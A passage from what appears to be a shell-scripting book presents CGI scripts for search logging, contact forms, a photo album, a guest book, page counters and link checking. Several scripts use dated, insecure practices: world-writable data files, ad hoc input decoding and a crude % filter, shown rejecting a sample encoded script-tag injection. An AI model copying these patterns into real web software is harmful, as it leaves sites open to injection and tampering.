pattern is not decoded, to ensure that no tricky hacks are attempted by users. (See the introduction to this chapter for
more details.)
Once logged, the web browser is redirected to the actual Yahoo! search page with the Lo ca t io n: ht tp header
value. Notice that simply appending ?$Q UERY _ S TRI N G is sufficient to relay the search pattern, however simple or
complex it may be, to its final destination.
The log file produced by this script has each query string prefaced by the current date and time, to build up a data file
that not only shows popular searches but can also be analyzed by time of day, day of week, month of year, and so
forth. There's lots of information that this script could mine on a busy site!
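You can verify the logging transformation by hand with a sample query string (the search phrase is invented):

```shell
QUERY_STRING='p=wicked+cool+scripts'

# Same sed as the script: drop the field name, turn + back into spaces
pattern="$(echo "$QUERY_STRING" | sed 's/p=//g;s/+/ /g')"
echo "$(date): $pattern"
```
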

Running the Script


To run this script, you need to create the HTML form, as shown earlier, and you need to have the script executable and
located on your server. (See the earlier section "Running the Scripts in This Chapter" for more details.) Then simply
submit a search query to the form, perhaps "nostarch." The results are from Yahoo!, exactly as expected, as shown in
Figure 8-2.

Figure 8-2: Yahoo! search results appear, but the search was logged!

The Results
As you can see, the user is prompted with a Yahoo! search box, submits a query, and, as shown in Figure 8-2, gets
standard Yahoo! search results. But there's now a log of the searches:
$ cat searchlog.txt
Fri Sep  5 11:16:37 MDT 2003: starch
Fri Sep  5 11:17:12 MDT 2003: nostarch
On a busy website, you will doubtless find that monitoring searches with the command tail -f searchlog.txt
is quite informative as you learn what kind of things people seek online.

#71 Building Web Pages on the Fly


Many websites have graphics and other elements that change on a daily basis. One good example of this is sites
associated with specific comic strips, such as Kevin & Kell, by Bill Holbrook. On his site, the home page always
features the most recent strip, and it turns out that the image-naming convention the site uses for the strip is easily
reverse-engineered, allowing you to include the cartoon on your own page.
A word from our lawyers

There are a lot of copyright issues to consider when scraping the


content off another website for your own. For this example, we received
explicit permission from Bill Holbrook to include his comic strip in this
book. I encourage you to get permission to reproduce any copyrighted
materials on your own site before you dig yourself into a deep hole
surrounded by lawyers.

The Code
#!/bin/sh
# kevin-and-kell.cgi - Builds a web page on the fly to display the latest
#    strip from the cartoon strip Kevin & Kell, by Bill Holbrook.
#    <Strip referenced with permission of the cartoonist>

month="$(date +%m)"
day="$(date +%d)"
year="$(date +%y)"

echo "Content-type: text/html"
echo ""
echo "<html><body bgcolor=white><center>"
echo "<table border=\"1\" cellpadding=\"2\" cellspacing=\"1\">"
echo "<tr bgcolor=\"#000099\">"
echo "<th><font color=white>Bill Holbrook's Kevin &amp; Kell</font></th></tr>"
echo "<tr><td><img "

# Typical URL: http://www.kevinandkell.com/2003/strips/kk20031015.gif

echo -n "src=\"http://www.kevinandkell.com/20${year}/"
echo "strips/kk20${year}${month}${day}.gif\">"
echo "</td></tr><tr><td align=\"center\">"
echo "&copy; Bill Holbrook. Please see "
echo "<a href=\"http://www.kevinandkell.com/\">kevinandkell.com</a>"
echo "for more strips, books, etc."
echo "</td></tr></table></center></body></html>"

exit 0

How It Works
A quick View Source of the home page for Kevin & Kell reveals that the URL for the graphic is built from the current
year, month, and day, as demonstrated here:
http://www.kevinandkell.com/2003/strips/kk20031015.gif
To build a page that includes this strip on the fly, therefore, the script needs to ascertain the current year (as a two-digit
value), month, and day (both with a leading zero, if needed). The rest of the script is just HTML wrapper to make the
page look nice. In fact, this is a remarkably simple shell script, given the resultant functionality.

Running the Script


Like the other CGI scripts in this chapter, this script must be placed in an appropriate directory so that it can be
accessed via the Web, with the appropriate file permissions. Then it's just a matter of invoking the proper URL from a
browser.

The Results

The web page changes every day, automatically. For the strip of 9 October, 2003, the resulting page is shown in Figure
8-3.

Figure 8-3: The Kevin & Kell web page, built on the fly

Hacking the Script


This concept can be applied to almost anything on the Web if you're so inspired. You could scrape the headlines from
CNN or the South China Morning Post, or get a random advertisement from a cluttered site. Again, if you're going to
make it an integral part of your site, make sure that it's either considered public domain or that you've arranged for
permission.

Turning Web Pages into Email Messages


Combining the method of reverse-engineering file-naming conventions with the website tracking utility shown in the
previous chapter (Script #68, Tracking Changes on Web Pages), you can email yourself a web page that updates not
only its content but its filename as well.
As an example, Cecil Adams writes a very witty and entertaining column for the Chicago Reader called "The Straight
Dope." The specific page for the latest column has a URL of
http://www.straightdope.com/columns/${now}.html, where now is the year, month, and day, in
the format YYMMDD. The page is updated with a new column every Friday. Having the new column emailed to a
specified address automatically is remarkably straightforward:
#!/bin/sh
# getdope - Grab the latest column of 'The Straight Dope.'
#    Set it up in cron to be run every Friday.

now="$(date +%y%m%d)"
url="http://www.straightdope.com/columns/${now}.html"
to="testing@yourdomain.com"      # change this as appropriate

( cat << EOF
Subject: The Straight Dope for $(date "+%A, %d %B, %Y")
From: Cecil Adams <dont@reply.com>
Content-type: text/html
To: $to

<html>
<body border=0 leftmargin=0 topmargin=0>
<div style='background-color:309;color:fC6;font-size:45pt;
 font-style:sans-serif;font-weight:900;text-align:center;
 margin:0;padding:3px;'>
THE STRAIGHT DOPE</div>
<div style='padding:3px;line-height:1.1'>
EOF
lynx -source "$url" | \
  sed -n '/<hr>/,$p' | \
  sed 's|src="../art|src="http://www.straightdope.com/art|' | \
  sed 's|href="..|href="http://www.straightdope.com|g'
echo "</div></body></html>"
) | /usr/sbin/sendmail -t

exit 0
Notice that this script adds its own header to the message and then sends it along, including all the footer and
copyright information on the original web page.
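The two trailing sed substitutions are what keep the emailed page intact: they rewrite the page's relative image and link paths into absolute URLs so they still resolve when the HTML is read as an email message. You can see the effect on a sample line:

```shell
#!/bin/sh
# Demonstrate the relative-to-absolute rewrite used by getdope on one
# representative <img> tag (the filename here is made up for illustration).
echo '<img src="../art/straight.gif">' | \
  sed 's|src="../art|src="http://www.straightdope.com/art|'
# <img src="http://www.straightdope.com/art/straight.gif">
```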

#72 Processing Contact Forms


While sophisticated CGI programming is almost always done in either Perl or C, simple tasks can often be
accomplished with a shell script. There are some security issues of which you should be conscious, because it's rather
easy to inadvertently pass a dangerous parameter (for example, an email address that a user enters) from a form to
the shell for evaluation, which a hacker might exploit. However, these potential security holes will likely never arise if
your CGI needs are sufficiently modest.
A very common page on a website is a contact request form, which is fed to the server for processing and then
emailed to the appropriate party within the organization. Here's the HTML source for a simple form (with a little
Cascading Style Sheet (CSS) information thrown in to make it pretty):
<body bgcolor=#CCFFCC><center>
<!-- Tweak action value if script is placed in /cgi-bin/ or other -->
<form method="post" action="074-contactus.cgi"
  style='border: 3px double #636;padding:4px'>
<div style='font-size:175%;font-weight:bold;
  border-bottom: 3px double #636'>We Love Feedback!</div>
Name: <input type="text" name="name"><br>
Email: <input type="text" name="email"><br>
Your message or comment (please be brief):<br>
<textarea rows="5" cols="70" name="comments"></textarea><br>
<input type="submit" value="submit">
</form>
</center>
This form has three input fields: one for name, one for email address, and one for comments. When the user clicks the
submit button, the information is packaged up and sent to contactus.cgi for interpretation and processing.
Because the form uses a method="post" encoding, the data is handed to the CGI script as standard input. For
entries of "Dave", "taylor@intuitive.com", and "my comment", the resulting data stream would be
name=Dave&email=taylor%40intuitive.com&comments=my+comment
That's all the information we need to create a shell script that turns the form's data stream into an
email message, mails it off, and puts up a thank-you message for the web surfer.

The Code
#!/bin/sh
# formmail - Processes the contact us form data, emails it to the designated
#    recipient, and returns a succinct thank-you message.

recipient="taylor"
thankyou="thankyou.html"      # optional 'thanks' page

( cat << EOF
From: (Your Web Site Contact Form) www@$(hostname)
To: $recipient
Subject: Contact Request from Web Site

Content of the Web site contact form:

EOF
cat - | tr '&' '\n' | \
  sed -e 's/+/ /g' -e 's/%40/@/g' -e 's/=/: /'
echo "" ; echo ""
echo "Form submitted on $(date)"
) | sendmail -t

echo "Content-type: text/html"
echo ""

if [ -r $thankyou ] ; then
  cat $thankyou
else
  echo "<html><body bgcolor=\"white\">"
  echo "Thank you. We'll try to contact you soonest."
  echo "</body></html>"
fi

exit 0

How It Works
The cat statement hands the form data to tr, which translates the field separator & into a newline; then sed cleans up
the data stream a bit, turning + into a space, the %40 encoding sequence into an @, and = into a colon followed by a space.
Finally, a rudimentary thank-you message is displayed to the user.
Frankly, this isn't the most elegant solution (a Perl-based script could have more flexibility, for example), but for a quick
and dirty hack, it'll do just fine.
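You can watch that decoding pipeline work by feeding it the sample data stream shown earlier:

```shell
#!/bin/sh
# Run the example form submission through the same tr/sed pipeline the
# script uses: & becomes a newline, + a space, %40 an @, and the first
# = on each line becomes ": ".
echo 'name=Dave&email=taylor%40intuitive.com&comments=my+comment' | \
  tr '&' '\n' | \
  sed -e 's/+/ /g' -e 's/%40/@/g' -e 's/=/: /'
# name: Dave
# email: taylor@intuitive.com
# comments: my comment
```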

Running the Script


Remember that every CGI script needs to be readable and executable by everyone. To use this contact form, you need
to save the HTML document somewhere on your site, perhaps on your home page or on another page called
contactus.html. It might look like Figure 8-4.

Figure 8-4: A typical user feedback form, already filled in


To run the CGI script, simply enter information into the fields specified on the form and click the submit button.

The Results
The results of running this script after submitting a contact query are twofold. An email is sent to the registered
recipient, and either the contents of a thank-you HTML document (the variable thankyou in the script) are displayed
or a rudimentary thank-you message is displayed. Here's the email produced from the form input shown in Figure 8-4:
From: (Your Web Site Contact Form) www@localhost.intuitive.com
To: taylor
Subject: Contact Request from Web Site

Content of the Web site contact form:

name: Dave Taylor
email: taylor@intuitive.com
comments: Very interesting example%2C but I don%27t like your form color scheme%21

Form submitted on Fri Sep 5 14:20:54 MDT 2003
Note that not all of the punctuation characters are translated back into their regular characters, so instead of
example, but we see example%2C but. This can be easily remedied by adding more mapping rules in the
sed statement, as desired.
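For instance, extending the existing sed invocation with three more rules handles commas (%2C), exclamation points (%21), and apostrophes (%27); the sample comment below is just illustrative input:

```shell
#!/bin/sh
# Same pipeline as in the script, with extra %xx mappings appended.
# Note the double-quoted final expression so the apostrophe replacement
# doesn't fight with the shell's own quoting.
echo 'comments=Very+interesting+example%2C+but+I+don%27t+like+it%21' | \
  tr '&' '\n' | \
  sed -e 's/+/ /g' -e 's/%40/@/g' -e 's/=/: /' \
      -e 's/%2C/,/g' -e 's/%21/!/g' -e "s/%27/'/g"
# comments: Very interesting example, but I don't like it!
```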

#73 Creating a Web-Based Photo Album


CGI shell scripts aren't limited to working with text. A common use of websites is to have a photo album that allows you
to upload lots of pictures and that has some sort of software to help organize everything and make it easy to browse.
Surprisingly, a basic "proof sheet" of photos in a directory is quite easy to produce as a shell script. Here's one that's
only 44 lines.

The Code
#!/bin/sh
# album - online photo album script

echo "Content-type: text/html"
echo ""

header="header.html"
footer="footer.html"
count=0

if [ -f $header ] ; then
  cat $header
else
  echo "<html><body bgcolor='white' link='#666666' vlink='#999999'><center>"
fi

echo "<h3>Contents of $(dirname $SCRIPT_NAME)</h3>"
echo "<table cellpadding='3' cellspacing='5'>"

for name in *jpg
do
  if [ $count -eq 4 ] ; then
    echo "</td></tr><tr><td align='center'>"
    count=1
  else
    echo "</td><td align='center'>"
    count=$(($count + 1))
  fi
  nicename="$(echo $name | sed 's/.jpg//;s/-/ /g')"
  echo "<a href='$name' target=_new><img style='padding:2px'"
  echo "src='$name' height='100' width='100' border='1'></a><BR>"
  echo "<span style='font-size:80%'>$nicename</span>"
done

echo "</td></tr></table>"

if [ -f $footer ] ; then
  cat $footer
else
  echo "</center></body></html>"
fi

exit 0

How It Works
Almost all of the code here is HTML to create an attractive output format. Take out the echo statements, and there's a
simple for loop that iterates through each JPEG file in the current directory.
The directory name in the <h3> block is extracted by using $(dirname $SCRIPT_NAME). If you flip back to the
output of Script #69, Seeing the CGI Environment, you'll see that SCRIPT_NAME contains the URL name of the CGI
script, minus the http:// prefix and the hostname. The dirname part of that expression strips off the actual name
of the script being run (index.cgi), so that only the current directory within the website file hierarchy is left.
This script also works best with a specific file-naming convention: Every filename has dashes where it would otherwise
have spaces. For example, the name value of sunset-at-home.jpg is transformed into the nicename of
sunset at home. It's a simple transformation, but one that allows each picture in the album to have an attractive
and human-readable name, rather than DSC00035.JPG or something similar.
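Here is that transformation on its own, exactly as the script performs it:

```shell
#!/bin/sh
# The nicename substitution: drop the .jpg suffix, then turn each dash
# into a space.
name="sunset-at-home.jpg"
nicename="$(echo $name | sed 's/.jpg//;s/-/ /g')"
echo "$nicename"      # sunset at home
```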

Running the Script


To have this script run, you must drop it into a directory full of JPEG images, naming the script index.cgi. If your
web server is configured properly, requesting to view that directory then automatically invokes index.cgi if no
index.html file is present, and you have an instant, dynamic photo album.

The Results
Given a directory of landscape and nature shots, the results are quite pleasing, as shown in Figure 8-5. Notice that
header.html and footer.html files are present in the same directory, so they are automatically included in the
output too.

Figure 8-5: An instant online photo album created with 44 lines of shell script!
See this page for yourself!

The photo album is online at


http://www.intuitive.com/wicked/examples/photos/

Hacking the Script


One limitation of this strategy is that the full-size version of each picture must be downloaded for the photo album view
to be shown; if you have a dozen 100K picture files, that could take quite a while for someone on a modem. The
thumbnails aren't really any smaller. The solution is to automatically create scaled versions of each image, which can
be done within a script by using a tool like ImageMagick. Unfortunately, very few Unix installations include
sophisticated graphics tools of this nature, so if you'd like to extend this photo album in that direction, start by learning
more about the ImageMagick tool at http://www.imagemagick.org/
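A scaling pass might look like the following sketch, which assumes ImageMagick's convert is installed. It echoes each command rather than executing it, so you can inspect the plan first; remove the echo to actually build the thumbnails:

```shell
#!/bin/sh
# makethumbs sketch - dry run of a thumbnail pass with ImageMagick.
# Prints one convert command per JPEG in the current directory;
# thumbnails would land in a thumbs/ subdirectory.

mkdir -p thumbs
for name in *.jpg
do
  [ -f "$name" ] || continue    # no matches leaves the literal '*.jpg'
  echo convert "$name" -resize 100x100 "thumbs/$name"
done
```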
Another way to extend this script would be to teach it to show a clickable "folder" icon for any subdirectories found, so
that you can have an entire file system or tree of photographs, organized into portfolios. To see how that might look,
visit my online photo portfolio, built around a (substantial, I admit) variation of this script:
http://portfolio.intuitive.com/

Note This photo album script is one of my favorites, and I've spent many a day expanding and improving upon
my own online photo album software. What's delightful about having this as a shell script is that it's
incredibly easy to extend the functionality in any of a thousand ways. For example, because I use a script
called showpic to display the larger images rather than just linking to the JPEG image, it would take
about 15 minutes to implement a per-image counter system so that people could see which images were
most popular. Explore my portfolio site, cited earlier, and pay attention to how things are hooked together:
It's all shell scripts underneath.

#74 Building a Guest Book


A common and popular feature of websites is a guest book, modeled after the book commonly found at bed-and-breakfasts and chic resorts. The concept's simple: Enter your name, email address, and a comment, and it'll be
appended to an existing HTML page that shows other guest comments.
To simplify things, the same script that produces the "add your own entry" form and processes new guest entries as
they're received will also display the existing guest book entries (saved in a separate text file) at the top of the web
page. Because of these three major blocks of functionality, this script is a bit on the long side, but it's well commented,
so it should be comprehensible. Ready?

The Code
#!/bin/sh
# guestbook - Displays the current guestbook entries, appends a
#    simple form for visitors to add their own comments, and
#    accepts and processes new guest entries. Works with a separate
#    data file that actually contains the guest data.

homedir=/home/taylor/web/wicked/examples
guestbook="$homedir/guestbook.txt"
tempfile="/tmp/guestbook.$$"
sedtemp="/tmp/guestbook.sed.$$"
hostname="intuitive.com"

trap "/bin/rm -f $tempfile $sedtemp" 0

echo "Content-type: text/html"
echo ""
echo "<html><title>Guestbook for $hostname</title>"
echo "<body bgcolor='white'><h2>Guestbook for $hostname</h2>"

if [ "$REQUEST_METHOD" = "POST" ] ; then

  # A new guestbook entry was submitted, so save the input stream

  cat - | tr '&+' '\n ' > $tempfile

  name="$(grep 'yourname=' $tempfile | cut -d= -f2)"
  email="$(grep 'email=' $tempfile | cut -d= -f2 | sed 's/%40/@/')"

  # Now, given a URL encoded string, decode some of the most important
  # punctuation (but not all punctuation!)

  cat << "EOF" > $sedtemp
s/%2C/,/g;s/%21/!/g;s/%3F/?/g;s/%40/@/g;s/%23/#/g;s/%24/$/g
s/%25/%/g;s/%26/\&/g;s/%28/(/g;s/%29/)/g;s/%2B/+/g;s/%3A/:/g
s/%3B/;/g;s/%2F/\//g;s/%27/'/g;s/%22/"/g
EOF

  comment="$(grep 'comment=' $tempfile | cut -d= -f2 | sed -f $sedtemp)"

  # Sequences to look out for: %3C = <   %3E = >   %60 = `

  if echo $name $email $comment | grep '%' ; then
    echo "<h3>Failed: illegal character or characters in input:"
    echo "Not saved.<br>Please also note that no HTML is allowed.</h3>"
  elif [ ! -w $guestbook ] ; then
    echo "<h3>Sorry, can't write to the guestbook at this time.</h3>"
  else
    # All is well. Save it to the data file!
    echo "$(date)|$name|$email|$comment" >> $guestbook
    chmod 777 $guestbook   # ensure it's not locked out to webmaster
  fi
fi

# If we have a guestbook to work with, display all entries

if [ -f $guestbook ] ; then
  echo "<table>"
  while read line
  do
    date="$(echo $line | cut -d\| -f1)"
    name="$(echo $line | cut -d\| -f2)"
    email="$(echo $line | cut -d\| -f3)"
    comment="$(echo $line | cut -d\| -f4)"
    echo "<tr><td><a href='mailto:$email'>$name</a> signed thusly:</td></tr>"
    echo "<tr><td><div style='margin-left: 1in'>$comment</div></td></tr>"
    echo "<tr><td align=right style='font-size:60%'>Added $date"
    echo "<hr noshade></td></tr>"
  done < $guestbook
  echo "</table>"
fi

# Now create input form for submitting new guestbook entries...

echo "<form method='post' action='$(basename $0)'>"
echo "Please feel free to sign our guestbook too:<br>"
echo "Your name: <input type='text' name='yourname'><br>"
echo "Your email address: <input type='text' name='email'><br>"
echo "And your comment:<br>"
echo "<textarea name='comment' rows='5' cols='65'></textarea>"
echo "<br><input type='submit' value='sign our guestbook'>"
echo "</form>"

echo "</body></html>"

exit 0

How It Works
The scariest-looking part of this code is the small block of sed commands that translate most of the common
punctuation characters from their URL encodings back to the actual character itself:
cat << "EOF" > $sedtemp
s/%2C/,/g;s/%21/!/g;s/%3F/?/g;s/%40/@/g;s/%23/#/g;s/%24/$/g
s/%25/%/g;s/%26/\&/g;s/%28/(/g;s/%29/)/g;s/%2B/+/g;s/%3A/:/g
s/%3B/;/g;s/%2F/\//g;s/%27/'/g;s/%22/"/g
EOF
If you look closely, however, it's just an s/old/new/g sequence over and over, with different %xx values being
substituted. The script could bulk-translate all URL encodings, also called escape sequences, but it's useful to ensure
that certain encodings, including those for <, >, and `, are not translated. Security, dontcha know: a nice way to
sidestep people who might be trying to sneak unauthorized HTML into your guest book display.
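You can see the safety net in action: a comment containing an encoded < or > keeps its % signs after the partial decoding, so the script's grep check rejects it. The hostile-looking input below is made up for illustration:

```shell
#!/bin/sh
# Partially decode a suspicious comment: %21 (!) is translated, but %3C (<)
# and %3E (>) deliberately are not, so the leftover % flags the entry.
comment="$(echo 'Nice site%21 %3Cscript%3E' | sed 's/%21/!/g')"
if echo "$comment" | grep '%' > /dev/null ; then
  echo "rejected: $comment"
fi
# rejected: Nice site! %3Cscript%3E
```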

Running the Script


In addition to allowing files within to be executed by the web server, the directory in which guestbook.cgi resides
also needs to have write permission so that the script can create a guestbook.txt file and add entries.
Alternatively, you can simply create the file by hand and ensure that it's readable and writable by all:
$ touch guestbook.txt
$ chmod 666 guestbook.txt
The following are some sample contents of the guestbook.txt file:
$ cat guestbook.txt
Sat Sep 6 14:57:02 MST 2003|Lucas Gonze|lucas@gonze.com|I very much enjoyed
my stay at your web site. Best of luck.
Sat Sep 6 22:54:49 MST 2003|Dee-Ann LeBlanc|dee@renaissoft.com|Kinda plain,
but that's better than it being covered in animations and flaming text. :)
Sun Sep 7 02:50:48 MST 2003|MC|null@mcslp.com|I don't want the world, I just
want your half.
Tue Sep 9 02:34:48 MST 2003|Andrey Bronfin|andreyb@elrontelesoft.com|Nice to
be here.

The Results
Figure 8-6 shows the guest book displaying the few entries just shown.

Figure 8-6: A guest book system, all in one neat shell script

Hacking the Script


The data file deliberately forces all the information of each guest book entry onto a single line, which might seem weird
but in fact makes certain modifications quite easy. For example, perhaps you'd rather have your guest book entries
arranged from newest to oldest (rather than the current oldest-to-newest presentation). In that case, rather than ending
the while loop with < $guestbook, you could begin it thusly:
cat -n $guestbook | sort -rn | cut -c8- | while
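Here's that trick on a three-line stand-in for the guest book file:

```shell
#!/bin/sh
# cat -n numbers each line (six right-aligned columns plus a tab, so the
# original text starts at character 8); sort -rn reverses by that number;
# cut -c8- strips the numbering back off.
printf 'first entry\nsecond entry\nthird entry\n' | \
  cat -n | sort -rn | cut -c8-
# third entry
# second entry
# first entry
```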
If you'd rather have a friendlier date format than the output of the date command, that'd be another easy tweak to the
script. On most systems, either the date man page or the strftime man page explains all the %x format values.
You can spend hours tweaking date formats, because there are more than 50 different ways to display
elements of the date and time using a format string.
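As a starting point, one friendlier possibility (the exact combination of format values is purely a matter of taste):

```shell
#!/bin/sh
# %A is the full weekday name and %B the full month name; see the
# strftime man page for the dozens of other format values.
date "+%A, %B %d, %Y at %H:%M"
```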
It should also be easy to customize the appearance of this guest book by perhaps having separate header.html
and footer.html files and then using an appropriate code block near the top and bottom of the script:
if [ -f header.html ] ; then
  cat header.html
fi
Finally, there are a lot of odd people on the Web, and I have learned that it's smart to keep a close eye on anything to
which people can add input without any screening process. As a result, a very sensible hack to this guest book script
would be to have new entries emailed to you, so that you could immediately delete any inappropriate or off-color entries
before being embarrassed by the content of your site.

#75 Creating a Text-Based Web Page Counter


One popular element of many web pages is a page counter that increments each time a request for the page in
question is served. A quick glance at the counter value then lets you see how popular your pages are and whether
they're seeing lots of visitors. While counters aren't typically written as shell scripts, that doesn't mean they can't be,
and we'll throw caution to the wind and build one ourselves!
The fundamental challenge with this particular script is that there's a possible race condition, a situation in which two
people visit the page simultaneously and each of the counter scripts steps on the other when writing to the data file.
You can try to solve the race condition within the script itself, but that's surprisingly tricky. Consider the following few
lines of code:
while [ -e $lockfile ] ; do
  sleep 1
done
touch $lockfile
It seems as though this should work, only allowing the script to escape the while loop when the lock file doesn't exist
and then immediately creating the lock file to keep everyone else out. But it doesn't work. Remember that two copies
can be running essentially simultaneously, so what happens if one ascertains that there's no lock file, gets through the
while loop, and then is swapped out by the CPU before creating the new lock file? Meanwhile, the second script
tests, also finds there's no lock file, and creates one, convinced it now has exclusive access to the data. Then the first
script swaps back in and touches the lock file (which already exists, though it doesn't know that), and mayhem ensues.
The solution is to use a utility written for the job, to ensure that you don't encounter a race condition in the middle of
your locking sequence. If you're lucky, your Unix has the helpful lockf command, which executes a specific
command while holding an exclusive file lock. If not, many Unixes have the lockfile utility as an alternative. To be
portable, this script works with both, depending on what it can find. Script #10 discusses this issue in greater depth too.

The Code
#!/bin/sh
# counter - A simple text-based page counter, with appropriate locking.

myhome="/home/taylor/web/wicked/examples"
counter="$myhome/counter.dat"
lockfile="$myhome/counter.lck"
updatecounter="$myhome/updatecounter"

# Note that this script is not intended to be called directly from
# a web browser, so it doesn't use the otherwise obligatory
# content-type header material.

# Ascertain whether we have lockf or lockfile system apps

if [ -z $(which lockf) ] ; then
  if [ -z $(which lockfile) ] ; then
    echo "(counter: no locking utility available)<br>"
    exit 0
  else   # proceed with the lockfile command
    trap "/bin/rm -f $lockfile" 0
    lockfile -1 -l 10 -s 2 $lockfile
    if [ $? -ne 0 ] ; then
      echo "(counter: couldn't create lockfile in time)"
      exit 0
    fi
    $updatecounter $counter
    if [ ! -f $counter ] ; then
      echo "0"   # it'll be created shortly
    else
      cat $counter
    fi
  fi
else
  lockf -s -t 10 $lockfile $updatecounter $counter
  if [ $? -ne 0 ] ; then
    echo "(counter: couldn't create lockfile in time)"
  fi
  if [ ! -f $counter ] ; then
    echo "0"   # it'll be created shortly
  else
    cat $counter
  fi
fi

exit 0
The counter script calls $updatecounter, a second, smaller script that's used to actually increment the counter.
It ignores any file-locking issues, assuming that they're dealt with elsewhere:
#!/bin/sh
# updatecounter - A tiny script that updates the counter file to
#    the value specified. Assumes that locking is done elsewhere.

if [ $# -ne 1 ] ; then
  echo "Usage: $0 countfile" >&2
  exit 1
fi

count="$(cat $1)"
newcount="$(( ${count:-0} + 1 ))"
echo "$newcount" > $1
chmod a+rw $1

exit 0

How It Works
The counter and updatecounter scripts do something quite simple: Together they open up a file; grab the
number therein; increment it; save the new, larger value; and display that value. All the complexity in these scripts is
associated with locking files to ensure that there's no collision when updating the counter value.
The basis of the main conditional ascertains whether the system has lockf (the preferred choice), lockfile (an
acceptable alternative), or nothing:
if [ -z $(which lockf) ] ; then
  if [ -z $(which lockfile) ] ; then
    echo "(counter: no locking utility available)<br>"
The which command looks for a specific command in the current PATH; if it can't find the command, which produces
no output, so the -z (is the string empty?) test succeeds. If neither lockf nor lockfile exists, the script just
refuses to run and quits, but if either locking system can be found, it uses that and proceeds.
The search path for scripts running within the CGI environment is often shorter than the path for interactive scripts, so if
you know that the system has lockf or lockfile and the script can't find it, you'll need to do one of two things.
Modify the runtime PATH by adding a line of code like the following to the beginning of the script, supplying the
directory that contains the program in question:
PATH="${PATH}:/home/taylor/bin"
Or replace both $(which lockf) and $(which lockfile) with the full lockf or lockfile path and
filename that you want to use in the script.

Running the Script


This script isn't intended to be invoked directly by a user or linked to directly by a web page. It is most easily run as a
server-side include (SSI) directive on an SSI-enabled web page, typically denoted by changing the suffix of the
enabled page from .html to .shtml so that the web server knows to process it specially.
The .shtml web page would have a line of code embedded in the HTML similar to the following:

<!--#exec cmd="/wicked/examples/counter.sh" -->

The Results
A short SSI page that includes a call to the counter.sh script is shown in Figure 8-7. This same HTML page also
uses Script #76, Displaying Random Text.

Figure 8-7: Server-side includes let us invoke shell scripts from within HTML files

Hacking the Script


If your system doesn't support SSI, another approach to getting a counter, though a bit clunky, would be to have a
wrapper script that emulates this simple SSI mechanism. Here's an example in which the string "---countervalue---",
embedded in the HTML page to display, will be replaced with the actual numeric counter value for the specified HTML
file:
#!/bin/sh
# streamfile - Outputs an HTML file, replacing the sequence
#    ---countervalue--- with the current counter value.
# This script should be referenced, instead of $infile, from other pages.

infile="page-with-counter.html"
counter="./counter.sh"

echo "Content-type: text/html"
echo ""

value="$($counter)"
sed "s/---countervalue---/$value/g" < $infile

exit 0

#76 Displaying Random Text


The built-in server-side include features offer some wonderful ways to expand and extend your website. One that's
a favorite with many webmasters is the ability to have an element of a web page change each time the page is loaded.
The ever-changing element might be a graphic, a news snippet, a featured subpage, or just a tag line for
the site itself, slightly different on each visit to keep the reader interested and hopefully coming
back for more.
What's remarkable is that this trick is quite easy to accomplish with a shell script containing an awk program only a
few lines long, invoked from within a web page via an SSI include (see Script #75 for an example of SSI directive
syntax and naming conventions for the file that calls the server-side include). Let's have a look.

The Code
#!/bin/sh

# randomquote - Given a one-line-per-entry data file, this
#    script randomly picks one line and displays it. Best used
#    as an SSI call within a web page.

awkscript="/tmp/randomquote.awk.$$"

if [ $# -ne 1 ] ; then
  echo "Usage: randomquote datafilename" >&2
  exit 1
elif [ ! -r "$1" ] ; then
  echo "Error: quote file $1 is missing or not readable" >&2
  exit 1
fi

trap "/bin/rm -f $awkscript" 0

cat << "EOF" > $awkscript
BEGIN { srand() }
      { s[NR] = $0 }
END   { print s[randint(NR)] }
function randint(n) { return int(n * rand()) + 1 }
EOF

awk -f $awkscript < "$1"
exit 0

How It Works
This script is one of the simplest in the book. Given the name of a data file, it checks to ensure that the file exists and
is readable, and then it feeds the entire file to a short awk script, which stores each line in an array (a simple data
structure) while counting lines, and then randomly picks one of the lines in the array and prints it to the screen.
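The awk portion can be exercised on its own. Here's the same store-then-pick logic as a standalone pipeline (the three input words are just placeholders):

```shell
printf 'one\ntwo\nthree\n' |
awk 'BEGIN { srand() }
           { s[NR] = $0 }
     END   { print s[int(NR * rand()) + 1] }'
```

Each run prints one of the three input lines. Note that srand() seeds from the time of day, so two runs within the same second will pick the same line.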

Running the Script


The script can be incorporated into an SSI-compliant web page with the line

<!--#exec cmd="randomquote.sh samplequotes.txt" -->

Most servers require that the web page that contains this SSI include have an .shtml filename suffix, rather than the
more traditional .html or .htm. With that simple change, the output of the randomquote command is
incorporated into the content of the web page.

The Results
The last few lines of Figure 8-7, in Script #75, show a randomly generated quote as part of a web page. However,
given a data file of one-liners borrowed from the Trivial.net tag line file (see http://www.trivial.net/), this
script can also be tested on the command line by calling it directly:

$ randomquote samplequotes.txt
Neither rain nor sleet nor dark of night... it's Trivial.net
$ randomquote samplequotes.txt
Spam? Not on your life. It's your daily dose of Trivial.net

Hacking the Script


It would be remarkably simple to have the data file that randomquote uses contain a list of graphic image names,
for example, and then use this simple script to rotate through a set of graphics. There's really quite a bit more you can
do with this idea once you think about it!

Chapter 9: Web and Internet Administration


If you're running a web server or are responsible for a website, simple or complex, you'll find yourself performing some
tasks with great frequency, ranging from identifying broken internal and external site links to checking for spelling errors
on web pages. Using shell scripts, you can automate these tasks, as well as some common client/server tasks, such
as ensuring that a remote directory of files is always completely in sync with a local copy, to great effect.

#77 Identifying Broken Internal Links


The scripts in Chapter 7 highlighted the value and capabilities of the lynx text-only web browser, but there's even
more power hidden within this tremendous software application. One capability that's particularly useful for a web
administrator is the traverse function (which you enable by using -traversal), which causes lynx to try to
step through all links on a site to see if any are broken. This feature can be harnessed in a short script.

The Code
#!/bin/sh

# checklinks - Traverses all internal URLs on a website, reporting
#   any errors in the "traverse.errors" file.

lynx="/usr/local/bin/lynx"     # this might need to be tweaked

# Remove all the lynx traversal output files upon completion:

trap "/bin/rm -f traverse*.errors reject*.dat traverse*.dat" 0

if [ -z "$1" ] ; then
  echo "Usage: checklinks URL" >&2 ; exit 1
fi

$lynx -traversal "$1" > /dev/null

if [ -s "traverse.errors" ] ; then
  echo -n $(wc -l < traverse.errors) errors encountered.
  echo Checked $(grep '^http' traverse.dat | wc -l) pages at ${1}:
  sed "s|$1||g" < traverse.errors
else
  echo -n "No errors encountered. " ;
  echo Checked $(grep '^http' traverse.dat | wc -l) pages at ${1}
  exit 0
fi

baseurl="$(echo $1 | cut -d/ -f3)"
mv traverse.errors ${baseurl}.errors
echo "(A copy of this output has been saved in ${baseurl}.errors)"
exit 0

How It Works
The vast majority of the work in this script is done by lynx; the script just fiddles with the resultant lynx output files
to summarize and display the data attractively. The lynx output file reject.dat contains a list of links pointing to
